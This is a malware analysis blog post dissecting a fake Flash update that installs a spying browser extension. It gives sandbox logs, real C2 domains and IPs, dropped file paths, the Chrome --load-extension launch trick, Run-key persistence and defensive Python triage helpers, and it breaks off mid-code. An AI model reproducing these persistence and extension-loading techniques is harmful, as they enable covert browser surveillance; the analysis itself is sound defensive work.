A week ago security researcher Dancho Danchev published an excellent post – Fake Adobe Flash Player Serving Campaign Utilizes Google Hosting/Redirection Infrastructure, Spreads Across Facebook

I was curious to learn more about this malware, so I ran the rogue binary (the fake Adobe Flash update named FlashGuncelle.exe) through our Vinsula Execution Engine (VEE) to analyze its behavior, and I also looked into specific parts of its decompiled source code.

Attack Overview

The diagram below highlights the key elements of the attack. In short, this malware delivers and installs malicious browser extensions for Chrome and Firefox.

 

Diagram

FlashGuncelle.exe

These are the hashes of the main executable FlashGuncelle.exe that camouflages itself as an Adobe Flash update:

  • MD5: 30118bec581f80de46445aef79e6cf10
  • SHA256: adec1707efaa1496691d5d4b12daaadff893b0f0ad68b33699e5dd7dd6f8eb58

The name of the executable, FlashGuncelle.exe, didn't sound English, so I checked on Google: according to Google Translate, "Flash Güncelleme" is Turkish for "Flash update". Indeed, as discussed below, several indicators suggest that this malware was created by a Turkish-speaking author.

Detection rate at the time of analysis: the sample (MD5: 30118bec581f80de46445aef79e6cf10) was detected on VirusTotal by 34 out of 47 antivirus scanners, for example as Trojan-Ransom.Win32.Blocker.dbud.

The file attributes of this malware, as shown in Windows Explorer, appear as:

 

File Attributes

 

Behavioral Analysis

Our first step was to run the fake Adobe Flash update through our Vinsula Execution Engine to find out what it does. Based on the results generated by Vinsula, we can confirm all of the findings published by Dancho Danchev and share some additional details about the behavior and the origins of this malware.

After launching the main malware executable FlashGuncelle.exe (MD5: 30118bec581f80de46445aef79e6cf10), the following screen pops up. The text in the progress bar, again in Turkish, reads "Please wait, updating!" (the decompiled code below sets it to "Luctfen bekleyin, gucncelleme yapılıyor!", an ASCII-mangled spelling of "Lütfen bekleyin, güncelleme yapılıyor!").

 

FlashGuncelle Progress Bar

Behind the scenes, FlashGuncelle.exe connects to a C2 server on TCP port 80. The server's domain name is eklentidunyasi[dot]com (Turkish for roughly "extension world"; eklenti means add-on or plugin), and the IP address that shows up in the log is 176.227.218.98. From this server the malware downloads an additional executable, YokExe.exe, which is larger than the downloader FlashGuncelle.exe because it embeds (as resources) the several other files discussed later.

FlashGuncelle.exe also copies itself to the \ProgramData folder under a different name, FlashUpdate.exe. Note that the copy lands directly in C:\ProgramData, not in the SExtension subfolder; both the file-event log and the decompiled code below show the path C:\ProgramData\FlashUpdate.exe.

Once the additional malware binary YokExe.exe is downloaded, FlashGuncelle.exe launches it.

YokExe.exe embeds several additional executables that play key roles in the infection process. After it starts, it drops the following files into the \ProgramData\SExtension folder:

  • Flash_Plugin.exe
  • Updater.exe
  • Ionic.Zip.dll
  • System.Data.SQLite.dll

A log file named "log_DDDD.txt" is also created in the same folder. The DDDD part is a number: the value of .NET's DateTime.Now.Ticks when the file was created, i.e. 100-nanosecond intervals counted from 1 January 0001 on the local clock of the infected machine (not a Win32 tick count, which would be far too small). The 635249660322534445 seen in the file-event log below decodes to 10 January 2014, which matches the date on the debugging screenshots. The same log file is shared by YokExe.exe and Flash_Plugin.exe and provides some debugging information as well as additional clues about the origin of the malware. More on this in the next sections.
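To turn such a log file name back into a timestamp during triage, here is a small helper. It is an added example, not code from the original post, from Vinsula or from the malware; it assumes the number is DateTime.Now.Ticks as described above, so the result is in the local time of the machine that wrote the file. The file names it is run on are the two from the file-event log in this post, plus a constructed non-matching name.

```python
import re
from datetime import datetime, timedelta

# .NET DateTime.Ticks: 100-nanosecond intervals since 0001-01-01 00:00:00.
TICKS_PER_MICROSECOND = 10
DOTNET_EPOCH = datetime(1, 1, 1)

# Matches log_<ticks>.txt as dropped into \ProgramData\SExtension.
LOG_NAME_RE = re.compile(r"^log_(\d{15,19})\.txt$", re.IGNORECASE)


def ticks_to_datetime(ticks: int) -> datetime:
    """Convert a .NET DateTime.Ticks value to a naive datetime.

    DateTime.Now.Ticks comes from the local clock of the machine that wrote
    the file, so the result is that machine's local time, not UTC.
    """
    if ticks < 0:
        raise ValueError("ticks must be non-negative")
    # Integer division drops the sub-microsecond part (1 tick = 0.1 us).
    return DOTNET_EPOCH + timedelta(microseconds=ticks // TICKS_PER_MICROSECOND)


def log_name_to_datetime(filename: str):
    """Return the timestamp encoded in a log_<ticks>.txt name, or None."""
    m = LOG_NAME_RE.match(filename)
    if not m:
        return None
    return ticks_to_datetime(int(m.group(1)))


def timeline(filenames):
    """Order log_<ticks>.txt names chronologically and compute the gap in
    seconds between consecutive files (useful to see how fast the stages
    ran)."""
    stamped = []
    for name in filenames:
        dt = log_name_to_datetime(name)
        if dt is not None:
            stamped.append((dt, name))
    stamped.sort()
    rows, prev = [], None
    for dt, name in stamped:
        gap = (dt - prev).total_seconds() if prev is not None else 0.0
        rows.append((name, dt, round(gap, 3)))
        prev = dt
    return rows


if __name__ == "__main__":
    # Two real names from the file-event log in this post, one constructed decoy.
    for name, dt, gap in timeline([
        "log_635249660382077851.txt",
        "log_635249660322534445.txt",
        "not_a_log.txt",
    ]):
        print(f"{name}  {dt:%Y-%m-%d %H:%M:%S.%f}  +{gap}s")
```

The two log files in the event log turn out to be about six seconds apart, which is consistent with Flash_Plugin.exe deleting the log written by YokExe.exe and creating its own shortly after starting.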

Upon completion, the malware displays the following screen. The text on the screen, "Güncelleme Tamamlandi", is Turkish for "Update Completed".

 

Update Completed

One of the tasks that YokExe.exe performs after extracting the embedded resource binaries is to launch Flash_Plugin.exe, which in turn downloads, installs, and loads the extensions for Chrome and Firefox through which the attacker captures the user's browser activity.

Flash_Plugin.exe connects to the host agentofex.com (which resolves to 37.220.17.43 and 176.227.218.99) and downloads from it a ZIP file containing all the browser extensions.

We tested the malware with Chrome only; the decompiled code below shows that it specifically targets both Chrome and Firefox (buflash.xpi, one of the files it drops, is a Firefox add-on package).

The process cascade view below, as reported by our Vinsula Execution Engine, shows the parent/child relationships between the processes involved in the execution of this malware.

 

+ FlashGuncelle.exe [Process Id: 2484]
	+ YokExe.exe [Process Id: 3508] 
		+ Flash_Plugin.exe [Process Id: 2776] 
			+ chrome.exe [Process Id: 200] 
				+ chrome.exe [Process Id: 612] 
				+ chrome.exe [Process Id: 1804] 
				+ chrome.exe [Process Id: 2404] 
				+ chrome.exe [Process Id: 2476] 
				+ chrome.exe [Process Id: 3140] 
				+ chrome.exe [Process Id: 3436]

As I will show in segments from the decompiled source code below, the process name YokExe.exe is hard-coded. "Yok" is actually one of the few Turkish words I know: it translates to "No" (or "there is none") in English, which gives the process the rather strange name of "NoExe.exe".

A more detailed view, including the command lines, also helps to see which parameters the different processes are given and what exactly Chrome is instructed to do by the malware process Flash_Plugin.exe. Below is a longer excerpt from the Vinsula Execution Engine log, in which we can clearly see that Flash_Plugin.exe launches chrome.exe with the command line "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\ProgramData\SExtension\SExtension\ext". The --load-extension switch makes Chrome load the unpacked extension from that directory for that browser session, bypassing the Chrome Web Store entirely. Because the switch only applies to the launch it is passed on, the malware has to start Chrome this way each time it wants the extension present, which is one reason Flash_Plugin.exe registers itself as a run-at-startup entry (see the registry section below).

+ FlashGuncelle.exe [Process Id: 2484] 
  Command Line: "c:\temp\f7d690f9c0c14c74a56ceb8494b49185\FlashGuncelle.exe" 
	+ YokExe.exe [Process Id: 3508] 
	  Command Line: "C:\ProgramData\YokExe.exe" 
		+ Flash_Plugin.exe [Process Id: 2776] 
		  Command Line: "C:\ProgramData\SExtension\Flash_Plugin.exe" 
			+ chrome.exe [Process Id: 200] 
			  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\ProgramData\SExtension\SExtension\ext"
				+ chrome.exe [Process Id: 612] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-GB --force-fieldtrials="AutocompleteDynamicTrial_2/DefaultControl_R2_Stable/BrowserPreReadExperiment/100-pct-default/CookieRetentionPriorityStudy/ExperimentOn/DeferBackgroundExtensionCreation/RateLimited/ForceCompositingMode/thread/InstantExtended/Group1 pct:25 stable:r4 use_remote_ntp_on_startup:1 espv:210 suppress_on_srp:1/Prerender/PrerenderEnabled/PrerenderLocalPredictorSpec/LocalPredictor=Disabled/ShowAppLauncherPromo/ShowPromoUntilDismissed/Test0PercentDefault/group_01/UMA-Dynamic-Binary-Uniformity-Trial/default/UMA-Dynamic-Uniformity-Trial/Group6/UMA-New-Install-Uniformity-Trial/Control/UMA-Session-Randomized-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-1-Percent/group_78/UMA-Uniformity-Trial-10-Percent/group_09/UMA-Uniformity-Trial-100-Percent/group_01/UMA-Uniformity-Trial-20-Percent/default/UMA-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-50-Percent/default/" --enable-threaded-compositing --extension-process --renderer-print-preview --disable-html-notifications --channel="200.3.904454566\1167562180" /prefetch:673131151
				+ chrome.exe [Process Id: 1804] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-GB --force-fieldtrials="AutocompleteDynamicTrial_2/DefaultControl_R2_Stable/BrowserPreReadExperiment/100-pct-default/CookieRetentionPriorityStudy/ExperimentOn/DeferBackgroundExtensionCreation/RateLimited/ForceCompositingMode/thread/InstantExtended/Group1 pct:25 stable:r4 use_remote_ntp_on_startup:1 espv:210 suppress_on_srp:1/Prerender/PrerenderEnabled/PrerenderLocalPredictorSpec/LocalPredictor=Disabled/ShowAppLauncherPromo/ShowPromoUntilDismissed/Test0PercentDefault/group_01/UMA-Dynamic-Binary-Uniformity-Trial/default/UMA-Dynamic-Uniformity-Trial/Group6/UMA-New-Install-Uniformity-Trial/Control/UMA-Session-Randomized-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-1-Percent/group_78/UMA-Uniformity-Trial-10-Percent/group_09/UMA-Uniformity-Trial-100-Percent/group_01/UMA-Uniformity-Trial-20-Percent/default/UMA-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-50-Percent/default/" --enable-threaded-compositing --renderer-print-preview --disable-html-notifications --channel="200.4.1864533236\761296897" /prefetch:673131151
				+ chrome.exe [Process Id: 2404] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-GB --force-fieldtrials="AutocompleteDynamicTrial_2/DefaultControl_R2_Stable/BrowserPreReadExperiment/100-pct-default/CookieRetentionPriorityStudy/ExperimentOn/DeferBackgroundExtensionCreation/RateLimited/ForceCompositingMode/thread/InstantExtended/Group1 pct:25 stable:r4 use_remote_ntp_on_startup:1 espv:210 suppress_on_srp:1/Prerender/PrerenderEnabled/PrerenderLocalPredictorSpec/LocalPredictor=Disabled/ShowAppLauncherPromo/ShowPromoUntilDismissed/Test0PercentDefault/group_01/UMA-Dynamic-Binary-Uniformity-Trial/default/UMA-Dynamic-Uniformity-Trial/Group6/UMA-New-Install-Uniformity-Trial/Control/UMA-Session-Randomized-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-1-Percent/group_78/UMA-Uniformity-Trial-10-Percent/group_09/UMA-Uniformity-Trial-100-Percent/group_01/UMA-Uniformity-Trial-20-Percent/default/UMA-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-50-Percent/default/" --enable-threaded-compositing --extension-process --renderer-print-preview --disable-html-notifications --channel="200.5.715101759\226981406" /prefetch:673131151
				+ chrome.exe [Process Id: 2476] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --channel="200.0.960705660\407094172" --supports-dual-gpus=false --gpu-driver-bug-workarounds=0,3,12,22 --gpu-vendor-id=0x15ad --gpu-device-id=0x0405 --gpu-driver-vendor="VMware, Inc." --gpu-driver-version=7.14.1.1211 --ignored=" --type=renderer " /prefetch:822062411
				+ chrome.exe [Process Id: 3140] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-GB --force-fieldtrials="AutocompleteDynamicTrial_2/DefaultControl_R2_Stable/BrowserPreReadExperiment/100-pct-default/CookieRetentionPriorityStudy/ExperimentOn/DeferBackgroundExtensionCreation/RateLimited/ForceCompositingMode/thread/InstantExtended/Group1 pct:25 stable:r4 use_remote_ntp_on_startup:1 espv:210 suppress_on_srp:1/Prerender/PrerenderEnabled/PrerenderLocalPredictorSpec/LocalPredictor=Disabled/ShowAppLauncherPromo/ShowPromoUntilDismissed/Test0PercentDefault/group_01/UMA-Dynamic-Binary-Uniformity-Trial/default/UMA-Dynamic-Uniformity-Trial/Group6/UMA-New-Install-Uniformity-Trial/Control/UMA-Session-Randomized-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-1-Percent/group_78/UMA-Uniformity-Trial-10-Percent/group_09/UMA-Uniformity-Trial-100-Percent/group_01/UMA-Uniformity-Trial-20-Percent/default/UMA-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-50-Percent/default/" --enable-threaded-compositing --renderer-print-preview --instant-process --disable-html-notifications --channel="200.1.549728062\849114718" /prefetch:673131151
				+ chrome.exe [Process Id: 3436] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-GB --force-fieldtrials="AutocompleteDynamicTrial_2/DefaultControl_R2_Stable/BrowserPreReadExperiment/100-pct-default/CookieRetentionPriorityStudy/ExperimentOn/DeferBackgroundExtensionCreation/RateLimited/ForceCompositingMode/thread/InstantExtended/Group1 pct:25 stable:r4 use_remote_ntp_on_startup:1 espv:210 suppress_on_srp:1/Prerender/PrerenderEnabled/PrerenderLocalPredictorSpec/LocalPredictor=Disabled/ShowAppLauncherPromo/ShowPromoUntilDismissed/Test0PercentDefault/group_01/UMA-Dynamic-Binary-Uniformity-Trial/default/UMA-Dynamic-Uniformity-Trial/Group6/UMA-New-Install-Uniformity-Trial/Control/UMA-Session-Randomized-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-1-Percent/group_78/UMA-Uniformity-Trial-10-Percent/group_09/UMA-Uniformity-Trial-100-Percent/group_01/UMA-Uniformity-Trial-20-Percent/default/UMA-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-50-Percent/default/" --enable-threaded-compositing --renderer-print-preview --signin-process --disable-html-notifications --channel="200.2.2088270437\1399557482" /prefetch:673131151

In our test with Chrome, the malware installed a malicious extension into Chrome using the files dropped by one of the malware binaries, Flash_Plugin.exe. Going through the decompiled code, it is evident that a similar mechanism is used to install and load the extension in Firefox. The following screenshot displays the details of the malicious Chrome extension.

Chrome Plugin

Ironically, the extension name shown in the screenshot above, "Güvenlik Duvarı", is also Turkish and translates to "Firewall".

The following screen shows the permissions granted to the malicious Chrome extension.

 

Chrome Plugin Permissions

After the malware installation completes and the malicious extension is loaded, the following screen pops up.

AgentofEx

The following list is a short segment from the Vinsula report that captures only the entries related to the IP addresses and ports that this malware and the processes it infected (in this case Chrome) talk to. The local address 255.254.253.252 is a placeholder for the sandbox machine's own address.

+ FlashGuncelle.exe [Process Id: 2484] 
	 =>  TCP IPv4 UNK 255.254.253.252:1118 <==> 176.227.218.98:80
	 =>  TCP IPv4 UNK 255.254.253.252:1119 <==> 176.227.218.98:80
	 =>  TCP IPv4 send 255.254.253.252:1118  ==> 176.227.218.98:80
	 =>  TCP IPv4 recv 255.254.253.252:1118 <==  176.227.218.98:80
	 =>  TCP IPv4 send 255.254.253.252:1119  ==> 176.227.218.98:80
	 =>  TCP IPv4 recv 255.254.253.252:1119 <==  176.227.218.98:80
	 =>  TCP IPv4 UNK 255.254.253.252:1120 <==> 46.163.100.240:80
	 =>  TCP IPv4 send 255.254.253.252:1120  ==> 46.163.100.240:80
	 =>  TCP IPv4 recv 255.254.253.252:1120 <==  46.163.100.240:80
+ Flash_Plugin.exe [Process Id: 2776] [Parent Id: 3508] 
  Command Line: "C:\ProgramData\SExtension\Flash_Plugin.exe" 
	 =>  TCP IPv4 UNK 255.254.253.252:1121 <==> 37.220.17.43:80
	 =>  TCP IPv4 send 255.254.253.252:1121  ==> 37.220.17.43:80
	 =>  TCP IPv4 recv 255.254.253.252:1121 <==  37.220.17.43:80
+ chrome.exe [Process Id: 200] [Parent Id: 2776] 
  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\ProgramData\SExtension\SExtension\ext"
	 =>  TCP IPv4 UNK 255.254.253.252:1122 <==> 74.125.136.94:443
	 =>  TCP IPv4 UNK 255.254.253.252:1123 <==> 74.125.136.94:443
	 =>  TCP IPv4 UNK 255.254.253.252:1124 <==> 74.125.136.84:443
	 =>  TCP IPv4 UNK 255.254.253.252:1125 <==> 74.125.136.84:443
	 =>  TCP IPv4 UNK 255.254.253.252:1126 <==> 74.125.136.147:443
	 =>  TCP IPv4 UNK 255.254.253.252:1127 <==> 74.125.136.95:443
	 =>  TCP IPv4 UNK 255.254.253.252:1128 <==> 74.125.136.139:443
	 =>  TCP IPv4 UNK 255.254.253.252:1129 <==> 74.125.136.147:443
	 =>  TCP IPv4 send 255.254.253.252:1122  ==> 74.125.136.94:443
	 =>  TCP IPv4 recv 255.254.253.252:1122 <==  74.125.136.94:443
	 =>  TCP IPv4 send 255.254.253.252:1123  ==> 74.125.136.94:443
	 =>  TCP IPv4 recv 255.254.253.252:1123 <==  74.125.136.94:443
	 =>  TCP IPv4 send 255.254.253.252:1124  ==> 74.125.136.84:443
	 =>  TCP IPv4 recv 255.254.253.252:1124 <==  74.125.136.84:443
	 =>  TCP IPv4 send 255.254.253.252:1125  ==> 74.125.136.84:443
	 =>  TCP IPv4 recv 255.254.253.252:1125 <==  74.125.136.84:443
	 =>  TCP IPv4 send 255.254.253.252:1126  ==> 74.125.136.147:443
	 =>  TCP IPv4 recv 255.254.253.252:1126 <==  74.125.136.147:443
	 =>  TCP IPv4 send 255.254.253.252:1127  ==> 74.125.136.95:443
	 =>  TCP IPv4 recv 255.254.253.252:1127 <==  74.125.136.95:443
	 =>  TCP IPv4 send 255.254.253.252:1128  ==> 74.125.136.139:443
	 =>  TCP IPv4 recv 255.254.253.252:1128 <==  74.125.136.139:443
	 =>  TCP IPv4 UNK 255.254.253.252:1130 <==> 74.125.136.120:443
	 =>  TCP IPv4 send 255.254.253.252:1130  ==> 74.125.136.120:443
	 =>  TCP IPv4 recv 255.254.253.252:1130 <==  74.125.136.120:443
	 =>  TCP IPv4 UNK 255.254.253.252:1131 <==> 74.125.136.84:443
	 =>  TCP IPv4 send 255.254.253.252:1131  ==> 74.125.136.84:443
	 =>  TCP IPv4 recv 255.254.253.252:1131 <==  74.125.136.84:443
	 =>  TCP IPv4 UNK 255.254.253.252:1132 <==> 74.125.136.101:443
	 =>  TCP IPv4 send 255.254.253.252:1132  ==> 74.125.136.101:443
	 =>  TCP IPv4 recv 255.254.253.252:1132 <==  74.125.136.101:443
	 =>  TCP IPv4 UNK 255.254.253.252:1133 <==> 176.31.2.150:443
	 =>  TCP IPv4 UNK 255.254.253.252:1134 <==> 176.31.2.150:443
	 =>  TCP IPv4 UNK 255.254.253.252:1135 <==> 74.125.136.94:443
	 =>  TCP IPv4 send 255.254.253.252:1133  ==> 176.31.2.150:443
	 =>  TCP IPv4 recv 255.254.253.252:1133 <==  176.31.2.150:443
	 =>  TCP IPv4 send 255.254.253.252:1134  ==> 176.31.2.150:443
	 =>  TCP IPv4 recv 255.254.253.252:1134 <==  176.31.2.150:443
	 =>  TCP IPv4 UNK 255.254.253.252:1136 <==> 74.125.136.94:443
	 =>  TCP IPv4 send 255.254.253.252:1135  ==> 74.125.136.94:443
	 =>  TCP IPv4 recv 255.254.253.252:1135 <==  74.125.136.94:443
	 =>  TCP IPv4 UNK 255.254.253.252:1137 <==> 37.220.17.43:80
	 =>  TCP IPv4 UNK 255.254.253.252:1138 <==> 37.220.17.43:80
	 =>  TCP IPv4 UNK 255.254.253.252:1139 <==> 74.125.136.100:80
	 =>  TCP IPv4 send 255.254.253.252:1137  ==> 37.220.17.43:80
	 =>  TCP IPv4 recv 255.254.253.252:1137 <==  37.220.17.43:80
	 =>  TCP IPv4 UNK 255.254.253.252:1140 <==> 95.85.40.246:80
	 =>  TCP IPv4 send 255.254.253.252:1138  ==> 37.220.17.43:80
	 =>  TCP IPv4 recv 255.254.253.252:1138 <==  37.220.17.43:80
	 =>  TCP IPv4 send 255.254.253.252:1139  ==> 74.125.136.100:80
	 =>  TCP IPv4 recv 255.254.253.252:1139 <==  74.125.136.100:80
	 =>  TCP IPv4 send 255.254.253.252:1140  ==> 95.85.40.246:80
	 =>  TCP IPv4 recv 255.254.253.252:1140 <==  95.85.40.246:80

Here is a short list of the IP addresses involved in the malware's execution. Not all of them are attacker infrastructure: the 74.125.136.x addresses belong to Google and are almost certainly Chrome's own background traffic over HTTPS, and 176.31.2.150 and 95.85.40.246 were contacted by the browser after the extension loaded but were not resolved further. The four addresses that the DNS lookups below tie to the two malware domains are the ones that matter for blocking.

176.227.218.98
176.227.218.99
46.163.100.240
37.220.17.43
95.85.40.246
74.125.136.84
74.125.136.94 
74.125.136.95
74.125.136.101
74.125.136.120
74.125.136.139
74.125.136.147
176.31.2.150

The following DNS lookup output (obtained through the lookup service at http://whois.net) maps the two main domain names to the IP addresses above:

eklentidunyasi.com
Non-authoritative answer:
Name:	eklentidunyasi.com
Address: 176.227.218.98 

agentofex.com
Non-authoritative answer:
Name:	agentofex.com
Address: 37.220.17.43
Name:	agentofex.com
Address: 176.227.218.99

Here are the geographical location reports for the four main malware IP addresses (one screenshot per address; notice that three of them are located in the UK and one in Germany):

176.227.218.98
176.227.218.99
46.163.100.240
37.220.17.43

Another aspect of our report that deserves attention is which additional files the malware drops and works with. I have shortened the list so that only the entries relevant to the malware's execution are shown.

 + FlashGuncelle.exe [Process Id: 2484] 
	 Event:Create File[C:\ProgramData\FlashUpdate.exe]
	 Event:Write File[C:\ProgramData\FlashUpdate.exe]
	 Event:Create File[C:\ProgramData\YokExe.exe]
	 Event:Write File[C:\ProgramData\YokExe.exe]
	 + YokExe.exe [Process Id: 3508]
		 Event:Create File[C:\ProgramData\SExtension\Flash_Plugin.exe]
		 Event:Write File[C:\ProgramData\SExtension\Flash_Plugin.exe]
		 Event:Create File[C:\ProgramData\SExtension\Ionic.Zip.dll]
		 Event:Write File[C:\ProgramData\SExtension\Ionic.Zip.dll]
		 Event:Create File[C:\ProgramData\SExtension\System.Data.SQLite.dll]
		 Event:Write File[C:\ProgramData\SExtension\System.Data.SQLite.dll]
		 Event:Create File[C:\ProgramData\SExtension\Updater.exe]
		 Event:Write File[C:\ProgramData\SExtension\Updater.exe]
		 + Flash_Plugin.exe [Process Id: 2776] 
			 Event:Delete File[C:\ProgramData\SExtension\log_635249660322534445.txt]
			 Event:Open File[C:\ProgramData\SExtension\log_635249660322534445.txt]
			 Event:Create File[C:\ProgramData\SExtension\log_635249660382077851.txt]
			 Event:Write File[C:\ProgramData\SExtension\log_635249660382077851.txt]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\buflash.xpi]
			 Event:Write File[C:\ProgramData\SExtension\SExtension\buflash.xpi]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\bune10.zip]
			 Event:Write File[C:\ProgramData\SExtension\SExtension\bune10.zip]
			 Event: File[C:\ProgramData\SExtension\SExtension\ext]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext]
			 Event: File[C:\ProgramData\SExtension\SExtension\ext\extension.js]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\extension.js]
			 Event:Rename File[C:\ProgramData\SExtension\SExtension\ext\extension.js.tmp] New File[\Device\HarddiskVolume1\ProgramData\SExtension\SExtension\ext\extension.js]
			 Event: File[C:\ProgramData\SExtension\SExtension\ext\go.js]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\go.js]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\go.js]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\go.js]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\go.js.tmp]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\go.js.tmp]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\go.js.tmp]
			 Event:Rename File[C:\ProgramData\SExtension\SExtension\ext\go.js.tmp] New File[\Device\HarddiskVolume1\ProgramData\SExtension\SExtension\ext\go.js]
			 Event:Write File[C:\ProgramData\SExtension\SExtension\ext\go.js.tmp]
			 Event: File[C:\ProgramData\SExtension\SExtension\ext\index.html]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\index.html]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\index.html]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\index.html]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\index.html.tmp]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\index.html.tmp]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\index.html.tmp]
			 Event:Rename File[C:\ProgramData\SExtension\SExtension\ext\index.html.tmp] New File[\Device\HarddiskVolume1\ProgramData\SExtension\SExtension\ext\index.html]
			 Event:Write File[C:\ProgramData\SExtension\SExtension\ext\index.html.tmp]
			 Event: File[C:\ProgramData\SExtension\SExtension\ext\manifest.json]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\manifest.json]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\manifest.json]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\manifest.json]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\manifest.json.tmp]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\manifest.json.tmp]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\manifest.json.tmp]
			 Event:Rename File[C:\ProgramData\SExtension\SExtension\ext\manifest.json.tmp] New File[\Device\HarddiskVolume1\ProgramData\SExtension\SExtension\ext\manifest.json]
			 Event:Write File[C:\ProgramData\SExtension\SExtension\ext\manifest.json.tmp]

Now let's summarize the files that are dropped. All hashes are listed at the end of the post.

\ProgramData\FlashUpdate.exe
\ProgramData\YokExe.exe
\ProgramData\SExtension\Flash_Plugin.exe
\ProgramData\SExtension\Ionic.Zip.dll
\ProgramData\SExtension\System.Data.SQLite.dll
\ProgramData\SExtension\Updater.exe
\ProgramData\SExtension\SExtension\buflash.xpi
\ProgramData\SExtension\SExtension\bune10.zip
\ProgramData\SExtension\SExtension\ext\background.js
\ProgramData\SExtension\SExtension\ext\extension.js
\ProgramData\SExtension\SExtension\ext\go.js
\ProgramData\SExtension\SExtension\ext\index.html
\ProgramData\SExtension\SExtension\ext\manifest.json

The rogue Adobe Flash update persists by registering two run-at-startup entries under the HKCU Run key: one for the FlashUpdate.exe copy (written by FlashGuncelle.exe) and one for Flash_Plugin.exe (written by Flash_Plugin.exe itself), as can be seen below:

+ FlashGuncelle.exe [Process Id: 2484]
  Action:NtSetValueKey Key:HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
         Name:FlashGuncelle 
         Value:"C:\ProgramData\FlashUpdate.exe"
+ Flash_Plugin.exe [Process Id: 2776]
  Action:NtSetValueKey Key:HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
         Name:Extension 
         Value:"C:\ProgramData\SExtension\Flash_Plugin.exe"
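Both entries point into C:\ProgramData, a location any standard user can write to, which is a cheap triage signal on its own. Added example, not from the original post: a helper that reads the HKCU Run key (on Windows, via winreg) or takes a dict of name/value pairs, and flags entries whose executable lives in a user-writable directory. The sample entries are constructed from the registry log above plus two assumed benign entries; the list of user-writable directories is a heuristic, so legitimate per-user installs (for example in AppData) will show up too and need to be vetted rather than removed blindly.

```python
import os
import re
import sys

# Directory markers (lower-cased, backslash paths) that a non-admin user can
# create files under; a Run entry pointing there was not installed by a
# machine-wide package and deserves a closer look.
USER_WRITABLE = (
    "\\programdata\\",
    "\\users\\public\\",
    "\\appdata\\local\\",
    "\\appdata\\roaming\\",
    "\\temp\\",
)
_QUOTED = re.compile(r'^"([^"]+)"')


def image_path(value: str) -> str:
    """Pull the executable path out of Run value data.

    Handles the quoted form '"C:\\x\\y.exe" /arg' and the unquoted form
    'C:\\x\\y.exe /arg'; for an unquoted value without '.exe' the first token
    is returned.
    """
    value = value.strip()
    m = _QUOTED.match(value)
    if m:
        return m.group(1)
    idx = value.lower().find(".exe")
    if idx != -1:
        return value[: idx + 4]
    return value.split(" ", 1)[0]


def triage_run_entries(entries: dict[str, str]) -> list[dict]:
    """entries maps Run value name -> value data; returns the flagged ones."""
    flagged = []
    for name, data in entries.items():
        # %VAR% expansion only happens on Windows; elsewhere the raw path is kept.
        path = os.path.expandvars(image_path(data))
        normalized = path.replace("/", "\\").lower()
        hits = [m.strip("\\") for m in USER_WRITABLE if m in normalized]
        if hits:
            flagged.append({
                "name": name,
                "path": path,
                "reason": "executable lives under user-writable " + ", ".join(hits),
            })
    return flagged


def read_hkcu_run() -> dict[str, str]:
    """Read HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run on Windows;
    return an empty dict on other platforms so the triage code still imports."""
    if sys.platform != "win32":
        return {}
    import winreg
    entries = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:      # no more values
                break
            entries[name] = str(data)
            i += 1
    return entries


# Constructed sample: the two entries from the Vinsula registry log in this post
# plus two assumed benign entries for contrast.
SAMPLE_RUN = {
    "FlashGuncelle": r'"C:\ProgramData\FlashUpdate.exe"',
    "Extension": r'"C:\ProgramData\SExtension\Flash_Plugin.exe"',
    "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
    "VMware User Process": r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr',
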